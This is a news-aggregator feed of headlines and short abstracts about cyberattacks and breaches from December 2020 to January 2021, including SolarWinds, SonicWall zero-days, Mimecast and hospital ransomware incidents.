Security vendors Fidelis, Mimecast, Palo Alto Networks, and Qualys revealed that were also impacted by SolarWinds supply chain attack The SolarWinds supply chain attack is worse than initially thought, other security providers, confirmed that they...Security Affairs
January 26, 2021
BEC attack techniques exploit Microsoft 365 messages Full Text
Abstract
Attackers exploit Microsoft 365 “read receipt” and “out of office” message loopholes to evade auto-remediation of a malicious email.SCMagazine
January 26, 2021
South Carolina County Suffers Weekend Cyberattack Full Text
Abstract
A statement from Georgetown County’s local government said the county’s computer network “suffered a major infrastructure breach over the weekend.” Most of the county’s electronic systems, including emails, were impacted.Security Week
January 25, 2021
Leading crane maker Palfinger hit in global cyberattack Full Text
Abstract
Leading crane and lifting manufacturer Palfinger is targeted in an ongoing cyberattack that has disrupted IT systems and business operations.BleepingComputer
January 25, 2021
SonicWall Probes Attack Using Zero-Days in Own Products Full Text
Abstract
SMA 100 Series under investigation after “sophisticated” attackInfosecurity Magazine
January 24, 2021
SonicWall says it was hacked using zero-days in its own products Full Text
Abstract
Networking device maker SonicWall has disclosed that it is investigating a security breach of its internal network after detecting what it described as a "coordinated attack."ZDNet
January 23, 2021
SonicWall network attacked via zero days in its VPN and secure access solutions Full Text
Abstract
Cybersecurity firm SonicWall disclosed Friday night that hackers attacked the company’s internal networks by first exploiting zero-day vulnerabilities in its very own secure remote access products. SC Media received an anonymous tip Friday that SonicWall had suffered an attack, but did not get confirmation ahead of the disclosure by the company. SonicWall, whose product line…SCMagazine
January 23, 2021
SonicWall firewall maker hacked using zero-day in its VPN device Full Text
Abstract
Security hardware manufacturer SonicWall has issued an urgent security notice about threat actors exploiting a zero-day vulnerability in their VPN products to perform attacks on their internal systems.BleepingComputer
January 23, 2021
SonicWall firewall maker attacked using zero-day in its VPN device Full Text
Abstract
Security hardware manufacturer SonicWall has issued an urgent security notice about threat actors exploiting a zero-day vulnerability in their VPN products to perform attacks on their internal systems.BleepingComputer
January 23, 2021
Security firm SonicWall was victim of a coordinated attack Full Text
Abstract
The Hacker News reported in exclusive that the security firm SonicWall was hacked as a result of a coordinated attack on its internal systems. TheHackerNews revealed in an exclusive that the security provider SonicWall was hacked on Friday. The...Security Affairs
January 22, 2021
MyFreeCams site hacked to steal info of 2 million paying users Full Text
Abstract
A hacker is selling a database with login details for two million high-paying users of the MyFreeCams adult video streaming and chat service.BleepingComputer
January 22, 2021
MyFreeCams Hacked: 2 Million User Records Sold Online Full Text
Abstract
The data was allegedly exfiltrated from the company servers in December 2020 by carrying out an SQL injection attack, and includes 2 million user records of MyFreeCams Premium members.Cyber News
January 21, 2021
CHwapi hospital hit by Windows BitLocker encryption cyberattack Full Text
Abstract
The CHwapi hospital in Belgium is suffering from a cyberattack where threat actors claim to have encrypted 40 servers and 100 TB of data using Windows Bitlocker.BleepingComputer
January 21, 2021
Microsoft Releases New Info on SolarWinds Attack Chain Full Text
Abstract
More than one month after the SolarWinds breach that impacted numerous organizations was first uncovered, new details of the sophisticated operation continue to trickle out.Dark Reading
January 20, 2021
Bot ‘FreakOut’ leverages three critical vulnerabilities to attack Linux systems Full Text
Abstract
Based on the malware features, the researchers said the attackers use the compromised systems for further attacks, spreading laterally across the victim company’s network, or launching attacks on outside targets while masquerading as the compromised company.SCMagazine
January 20, 2021
Malwarebytes Hit by SolarWinds Attackers Full Text
Abstract
The attack vector was not the Orion platform but rather an email-protection application for Microsoft 365.Threatpost
January 19, 2021
Atlanta Synagogue Reports Cyber-Attack Full Text
Abstract
Annual Martin Luther King Jr. Shabbat service disrupted by “malicious user agents”Infosecurity Magazine
January 19, 2021
Livecoin crypto exchange shuts down after losing domain to hackers Full Text
Abstract
Livecoin has announced shutting down its operations, after becoming the victim of an alleged “carefully planned attack” that halted its operations temporarily on December 24, 2020,Hackread
January 18, 2021
A Sophisticated Windows and Android Hacking Operation Using Zero-Day Exploits Full Text
Abstract
Google experts unveiled an attack campaign purportedly by a sophisticated hacking group targeting Windows and Android users with zero-day and n-day exploits.Cyware Alerts - Hacker News
January 18, 2021
FBI warns of vishing attacks stealing corporate accounts Full Text
Abstract
The Federal Bureau of Investigation (FBI) has issued a notification warning of ongoing vishing attacks attempting to steal corporate accounts and credentials for network access and privilege escalation from US and international-based employees.BleepingComputer
January 16, 2021
xHunt Campaign Adopts New Enhancements to Evade Detection Full Text
Abstract
A sophisticated group is using a webshell called BumbleBee in an ongoing xHunt campaign targeting Microsoft Exchange servers at Kuwaiti organizations.Cyware Alerts - Hacker News
January 14, 2021
CISA says multiple attacks on cloud services bypassed multifactor authentication Full Text
Abstract
Threat actors have used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a so-called “pass-the-cookie” attack that bypassed multifactor authentication to exploit cloud security weaknesses.SCMagazine
January 13, 2021
Google discloses hacking campaign targeting Windows, Android users Full Text
Abstract
Project Zero, Google's 0day bug-hunting team, revealed a hacking campaign coordinated by "a highly sophisticated actor" and targeting Windows and Android users with zero-day and n-day exploits.BleepingComputer
January 13, 2021
Mimecast Cert Abused to Target Inboxes in “Sophisticated” Attack Full Text
Abstract
Security vendor says attackers used it to access Microsoft 365 accountsInfosecurity Magazine
January 13, 2021
Project Zero Discovers Exploits via Watering Hole Attacks Full Text
Abstract
Researchers discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android devices.Google Project Zero
January 13, 2021
Google reveals sophisticated Windows and Android hacking operation Full Text
Abstract
Google published a six-part report today detailing a sophisticated hacking operation that the company detected in early 2020 and which targeted owners of both Android and Windows devices.ZDNet
January 12, 2021
Sophisticated hacking campaign uses Windows and Android zero-days Full Text
Abstract
Google Project Zero researchers uncovered a sophisticated hacking campaign that targeted Windows and Android users. The Google Project Zero team has recently launched an initiative aimed at devising new techniques to detect 0-day exploits employed...Security Affairs
January 12, 2021
Colombian Energy, Metal Firms Under Attack in New Cyberespionage Campaign Full Text
Abstract
A wave of attacks against companies in Columbia uses a trio of RATs to steal confidential, sensitive data. The campaign, dubbed Operation Spalax, was revealed by ESET researchers on Tuesday.ZDNet
January 12, 2021
Mimecast discloses Microsoft 365 SSL certificate compromise Full Text
Abstract
Email security company Mimecast has disclosed today that a "sophisticated threat actor" compromised one of the certificates the company issues for customers to securely connect Microsoft 365 Exchange to their services.BleepingComputer
January 10, 2021
New Zealand central bank hit by a cyber attack Full Text
Abstract
A cyber attack hit the New Zealand central bank, sensitive information has been potentially accessed by the intruders The New Zealand central bank announced today that a cyber attack hit its infrastructure. According to the Government organization,...Security Affairs
January 08, 2021
New Attack Could Let Hackers Clone Your Google Titan 2FA Security Keys Full Text
Abstract
Hardware security keys—such as those from Google and Yubico—are considered the most secure means to protect accounts from phishing and takeover attacks. But a new research published on Thursday demonstrates how an adversary in possession of such a two-factor authentication (2FA) device can clone it by exploiting an electromagnetic side-channel in the chip embedded in it. The vulnerability (tracked as CVE-2021-3011 ) allows the bad actor to extract the encryption key or the ECDSA private key linked to a victim's account from a FIDO Universal 2nd Factor (U2F) device like Google Titan Key or YubiKey, thus completely undermining the 2FA protections. "The adversary can sign in to the victim's application account without the U2F device, and without the victim noticing," NinjaLab researchers Victor Lomne and Thomas Roche said in a 60-page analysis. "In other words the adversary created a clone of the U2F device for the victim's application account. This clThe Hacker News
January 7, 2021
TA551: Email Attack Campaign Switches from Valak to IcedID Full Text
Abstract
The recent campaign has targeted German, Italian and Japanese speakers. TA551 has historically pushed different families of information-stealing malware like Ursnif and Valak.Palo Alto Networks
January 6, 2021
SolarWinds hack: Amid hardened security, attackers seek softer targets Full Text
Abstract
Experts disagree that election security efforts detracted from supply chain security. But there are still lessons to be learned.SCMagazine
January 5, 2021
Cyberattacks on Healthcare Spike 45% Since November Full Text
Abstract
The relentless rise in COVID-19 cases is battering already frayed healthcare systems — and ransomware criminals are using the opportunity to strike.Threatpost
January 5, 2021
FBI Warns of Swatting Attacks Full Text
Abstract
Swatting attacks targeting smart-home device users trigger public warning from FBIInfosecurity Magazine
January 5, 2021
Cyberattacks Against K-12 Schools Expected to Rise in 2021, FBI Warns Full Text
Abstract
With students returning to online classrooms after the holidays, the FBI) expects a proliferation of cyber threats targeting K-12 schools and distance learning platforms.Bit Defender
January 5, 2021
Supply Chain Issues Don’t Seem to Go Away Full Text
Abstract
Supply chain attacks have gained a lot of popularity among cybercriminals as inclusion or intrusion in a project can impact plenty of users and go undetected for a long time.Cyware Alerts - Hacker News
January 05, 2021
North Korean software supply chain attack targets stock investors Full Text
Abstract
North Korean hacking group Thallium aka APT37 has been targeting a private stock investment messenger service in a supply chain attack, as reported this week.BleepingComputer
January 5, 2021
Old Attack Method Against Google’s Audio-Based reCAPTCHA Resurrected Full Text
Abstract
An attack method called unCaptcha discovered in 2017 for defeating the audio version of Google’s reCAPTCHA system using speech-to-text services has once again been resurrected.Security Week
January 5, 2021
How to bypass the Google Audio reCAPTCHA with a new version of unCaptcha2 attack Full Text
Abstract
A German security researcher demonstrated how to break, once again, the Google Audio reCAPTCHA with Google's own Speech to Text API. Back in 2017, researchers from the University of Maryland demonstrated an attack method, dubbed unCaptcha, against...Security Affairs
January 4, 2021
Cyber-Attack on US Laboratory Full Text
Abstract
Apex Laboratory discloses summertime cyber-attackInfosecurity Magazine
December 30, 2020
Antwerp laboratory becomes latest victim of cyber-attack Full Text
Abstract
The attack took place on the General Medical Laboratory (AML) in the Antwerp district of Hoboken. Hackers installed ransomware on the lab’s website, bringing it to a standstill.Brussels Times
December 29, 2020
Finnish Parliament Says Intruders Gained Access to Some MPs’ Email Accounts Full Text
Abstract
In an official statement, KRP Commissioner Tero Muurman said the attack did not cause any damage to the Parliament's internal IT system but was not an accidental intrusion either.ZDNet
December 28, 2020
Scottish Environment Protection Agency targeted in cyberattack Full Text
Abstract
The Scottish Environment Protection Agency (Sepa) has been targeted in a significant cyberattack in the early hours of Christmas Eve, it's executive director, David Pirie, confirmed.STV
December 28, 2020
Microsoft Warned CrowdStrike of Possible Hacking Attempt Full Text
Abstract
Microsoft warned CrowdStrike earlier this month of a failed attempt by unidentified attackers to access and read the company's emails, according to a blog post published by the security firm.Info Risk Today